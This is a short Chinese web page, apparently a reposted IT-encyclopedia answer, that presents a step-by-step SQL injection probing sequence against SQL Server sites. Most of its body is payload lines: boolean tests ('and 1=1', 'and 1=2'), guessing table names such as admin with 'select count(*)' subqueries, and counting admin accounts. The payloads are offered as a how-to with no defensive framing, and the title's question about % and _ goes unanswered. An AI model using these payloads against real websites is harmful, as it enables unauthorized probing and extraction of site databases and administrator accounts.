投稿
  1. 首页
  2. IT百科

SQLServer可以使用%和_进行注入检测的SQL语句一般长什么样?

网站设计模板 2023-5-17 IT百科 阅读 4

SQLServer可以使用%和_进行注入检测的SQL语句一般长什么样?,第1张

1.判断有无注入

and 1=1 and 1=2

2.猜表一般的表的名称无非是admin adminuser user pass password 等..

and 0<>(select count(*) from *)

and 0<>(select count(*) from admin) ---判断是否存在admin这张表

3.猜帐号数目 如果遇到0<返回正确页面 1<返回错误页面说明帐号数目就是1个

and 0<(select count(*) from admin)

and 1<(select count(*) from admin)

欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/bake/11662548.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
网站设计模板 网站设计模板 一级用户组
0 0
上一篇 2023-05-17
下一篇 2023-05-17

发表评论

登录后才能评论

评论列表(0条)

保存